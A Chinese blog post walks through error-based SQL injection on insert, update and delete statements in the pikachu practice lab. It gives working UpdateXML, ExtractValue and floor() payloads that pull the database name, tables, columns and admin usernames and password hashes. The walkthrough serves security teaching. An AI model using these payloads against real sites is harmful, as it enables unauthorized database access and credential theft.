SQL注入之insert/update/delete注入

最新推荐文章于 2024-01-11 18:38:03 发布
最新推荐文章于 2024-01-11 18:38:03 发布
阅读量3k 收藏 10
点赞数 2
分类专栏: 漏洞 文章标签: sql 安全漏洞 安全 信息安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104326877
版权

相关函数

UpdateXML(xml_target,xpath_expr,new_xml)
#此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。
#xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。
#如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。
#所有三个参数都应为字符串。

ExtractValue(xml_frag, xpath_expr)
#此函数是返回在xml_frag用xpath_expr路径匹配到的XML片段。

floor(x)
#此函数返回不大于x的最大整数。

注入原理

  1. 在UpdateXML()、ExtractValue()函数中,当参数xpath_expr路径语法错误时,就会报错,将xpath_expr中内容当作sql语句执行后结果和报错结果一同返回。
  2. floor()报错,需要count()、rand()、group by,三者缺一不可。
    floor(rand(0)*2)每次执行结果是基本固定的——011011…
    在使用group by floor(rand(0)*2)创建虚拟表的过程中,向虚拟表中插入数据时,主键的计算产生相同的结果,插入报错。
    floor报错原理详解

实验

insert注入

使用pikachu靶场中SQL-Inject的“insert/update”注入。
注册。

  1. 加单引号看一下报错。
    在这里插入图片描述
  2. 查数据库名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',database()),1))#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',database())))#在这里插入图片描述
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',database(),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a))#
    嵌套查询原因:里面的查询结果是一个虚拟表,所以需要外套一个查询语句。
    在这里插入图片描述
  3. 查表名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1)),1))#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1))))#
    在这里插入图片描述
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a))#
    在这里插入图片描述
    注意:一次只能取出一个,因此需要使用limit,第一个参数表示从哪条开始查,第二个参数表示查几条数据。
    limit 3,1查出users表。
    在这里插入图片描述
  4. 查字段名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),1))#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1))))#
    在这里插入图片描述
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a))#
    在这里插入图片描述
    limit 1,1查出username字段;
    limit 2,1查出password字段。
    在这里插入图片描述
    在这里插入图片描述
  5. 查数据payload。
    UpdateXML()函数:
    查username:1' and UpdateXML(1,concat('~',(select username from users limit 0,1)),1))#
    查password:1' and UpdateXML(1,concat(0,(select substr(password,1) from users where username='admin')),1))#
    ExtractValue()函数:
    查username:1' and ExtractValue(1,concat('~',(select username from users limit 0,1))))#
    查password:1' and ExtractValue(1,concat(0,(select substr(password,1) from users where username='admin'))))#
    在这里插入图片描述
    在这里插入图片描述
    UpdateXML()、ExtractValue()有长度限制,将之前想用来标记位置的’~'换成0,返回完整的32位md5值
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select concat(username,'~',password) from users limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a))#
    在这里插入图片描述
update注入(此处与insert注入相似,闭合不同)

使用pikachu靶场中SQL-Inject的“insert/update”注入。
注册账号后登录,修改个人信息。

  1. 查数据库名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',database()),1)#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',database()))#
    在这里插入图片描述
    在这里插入图片描述
    floor()报错:
    1' and (select 1 from (select count(*),concat('~',database(),'~',floor(rand(0)*2)) as x from information_schema.tables group by x)a)#)
    在这里插入图片描述

  2. 查表名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1)),1)#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1)))#
    limit 3,1查出users表
    在这里插入图片描述
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema = database() limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a)#

  3. 查字段名payload。
    UpdateXML()函数:
    1' and UpdateXML(1,concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),1)#
    ExtractValue()函数:
    1' and ExtractValue(1,concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1)))#
    limit 1,1查出字段username
    limit 2,1查出字段password
    在这里插入图片描述在这里插入图片描述
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select column_name from information_schema.columns where table_name = 'users' limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a)#

  4. 查数据payload。
    UpdateXML()函数:
    查username:1' and UpdateXML(1,concat('~',(select username from users limit 0,1)),1)#
    查password:1' and UpdateXML(1,concat(0,(select substr(password,1) from users where username='admin')),1)#
    ExtractValue()函数:
    查username:1' and ExtractValue(1,concat('~',(select username from users limit 0,1)))#
    查password:1' and ExtractValue(1,concat(0,(select substr(password,1) from users where username='admin')))#
    floor()报错:
    1'and (select 1 from (select count(*),concat('~',(select concat(username,'~',password) from users limit 0,1),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a)#

delete注入(此处与insert注入相似,闭合不同)

使用pikachu靶场中SQL-Inject的“delete”注入。
留言后删除抓包。

  1. 修改url,在id后增加and 1=1#and 1=2#后,前者删除成功,后者删除失败。猜测sql语句为delete from xxxx where id = x
  2. 查看数据库名payload。
    UpdateXML()函数:
    1 and UpdateXML(1,concat('~',database()),1)#
    ExtractValue()函数:
    1 and ExtractValue(1,concat('~',database()))#
    floor()报错:
    1 and (select 1 from (select count(*),concat('~',database(),'~',floor(rand(0)*2))as x from information_schema.tables group by x)a))#
    修改url时,需要对参数的值做url转码,再放包
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  3. 表名、字段名、数据等跟之前的payload相似。
wxlblh
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
25-5 SQL 注入攻击 - insert注入
weixin_43263566的博客
03-09 322
流量分析主要涵盖三个方面:报错注入、函数注入和盲注。这些都是 SQL 注入攻击的常见形式,而工具如 SQLMap 可用于检测和利用这些漏洞。注入手段:使用or逻辑运算符。使用pikachu靶场练习。
【3.23数据库作业9】SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
3/24 17:56 先列出昨天所学内容 3.5 数据更新 插入数据(INSERT) 修改数据(UPDATE) 删除数据(DELETE) 3.6空值的处理 空值的产生 空值的判断 空值的约束条件 3.7视图 定义视图 查询视图 更新视图 视图的作用 ok 我们开始 3.5 数据更新 两种数据插入方式 插入元组 插入子查询结果 -可以一次插入多个元组 INSERT —-插入元组 INSERT INTO [([,…)] VALUES ( [,]… ); 该语句在前面已学习过 —-插入子查询结果 INSERT INTO \[( \[,… )\] 子查询; 子查询SELECT子句目标列
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 5万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQLinsert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
插入数据: SQL的数据插入语句INSERT通常有两种形式,一种是插入一个元组,另一种是插入子查询结果。后者可以一次插入多个元组。 1、插入元组: 插入元组的INSERT语句格式为: INSERT INTO[([,]…)] VALUES([,]…) 其功能是将新元组插入指定表中。其中新元组的属性列1的值为常量1,属性列2的值为常量2。INTO子句中没有出现的属性列,新元组在这些列上会去空值。但必须注意的是,在表定义时说明了NOT NULL的属性列不能取空值,否则会出错。如果INTO子句中没有指明任何属性列名,则新插入的元组必须在每个属性列上均有值。 【例3.69】将一个新学生元组(学号:20
【数据库作业9】SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
CRUD —— 增删改查(create、retrieve、updatedelete) 同样是增改查,需要区分的是:create/ alter/ drop是对于数据库,表的操作,insert/ update/ delete是对数据的操作。 插入数据——INSERT INSERT INTO [([,...])] VALUES ([,...]) [3.69]将一个新学生元组插入到Student表中。 insert into student(sno,sname,ssex,sdept,sage) values('201215128','陈冬','男','is',18); [3.70]省去属性列的情况
SQL注入UPDATEinsertdelete注入
07-08 3073
SQL注入
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 4609
SQL注入_insert&delete&update&selete
渗透测试:详解sqlmap进行POST注入、基于insert注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 3824
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
insert注入
weixin_46784800的博客
11-10 1998
insert注入 insert用法 insert在数据库中可以直接插入数据,同时,insert还可以在数据库查询语句中用作字符串替换,例如: select insert("admin", 1, 1, ""); 上述语句查询结果为: 可以看见,insert语句可以将字符串指定位置的指定长度替换为指定字符串,该功能的insert语法为: INSERT(s1,x,len,s2) 其中的s1为目标字符串,x为替换的起始位置,len为替换的长度,s2为替换的字符串。通过改变len的值,可以获取到不同长度的字符串:
[Pikachu靶场实战系列] SQL注入insert/update注入
00勇士王子的博客
07-28 3209
insert注入 发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据 填写注册信息,然后抓个包,可以看到时post形式传输的数据 尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合 添加其他参数和)构建闭合 username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)# 构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,
数据库作业9:SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
INSERT INTO Student(Sno,Sname,Ssex,Sdept,Sage) VALUES('20121520','星河','男','IS',18); INTO中指出表名Student以及要增加的元组的属性。 【3.70】 INSERT INTO Student VALUES('20121521','张程敏','男'...
基于insert/update/delete注入
北冥有鱼
03-31 7140
之前的数字型,字符型,搜索型,都是通过selecte进行的一个操作,如果是insert/update/delete 需要一个怎样的操作呢 我们直接通过pikachu上的靶场来看一下 这边有一个注册按钮,点一下注册 还是老方法,用单引号确认是否存在注入点 发现返回了错误,说明这里是存在注入点的,我们知道这个地方的后端是用的insert,怎么样利用insert来进行操作呢? 这个地方正常来...
insertupdatedelete注入
scu_hacker博客
01-07 1322
前言: 本文章主要总结不同于普通查询sql注入,而是稍微少见的insertupdatedelete注入。 一、常见形式 (1)insertinsert into users(id,username,passowrd) values (2,'注入点','Olivia'); payload可以为: 'or updatexml() or ' (2)update: update users set id=1,username='注入点',password=3 payload为: 'o...
无痕渗透“INSERT INTO”型SQL注入
逆水行舟
12-30 2万+
原文链接:http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html 在某个寂静的深夜,你徘徊在一个网站中,其中包含一个可提交form,需要你输入一个昵称。你输入了一个单引号作为你的昵称,网站返回了一条异常信息:“You have an error in your SQL syntax”。机智的你很快明
Pikachu SQL注入insert/update注入
最新发布
SS_liang的博客
01-11 1318
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1086
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
insert/update注入
Ethan024的博客
03-30 957
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
SQL注入学习之insert,delete,update注入(九)
公众号:乌云安全
02-03 1989
0x00 简介 insert,delete,update 主要是用到盲注和报错注入,此类注入点不建议使用sqlmap等工具,会造成大量垃圾数据,和其他情况。 0x01 insert,delete,update insert 可以看到假如没闭合是会产生很多垃圾数据的,所以这类注入建议手工或者自己写工具。 一般这种注入会出现在 注册、ip头、留言板等等需要写入数据的地方,同时这种注入不报错一般较难发现。 报错 mysql> insert into admin (id,username,password
xml映射文件中,除了常见的select/insert/update/delete标签之外,还有哪些标签,都各自有什么作用?
03-23
除了常见的select/insert/update/delete标签,还有以下标签: 1. <resultMap>:用于定义结果集映射规则,将查询结果映射到Java对象中。 2. <parameterMap>:用于定义参数映射规则,将Java对象映射为SQL语句中的参数。 3. <sql>:用于定义可重用的SQL片段,可以在其他SQL语句中引用。 4. <include>:用于引用其他XML文件中定义的SQL片段。 5. <cache>:用于配置二级缓存,提高查询性能。 6. <selectKey>:用于在插入数据时获取自动生成的主键值。 7. <insert>、<update>、<delete>标签中的useGeneratedKeys和keyProperty属性:用于在插入数据时获取自动生成的主键值。 以上标签各自有不同的作用,可以根据需要选择使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值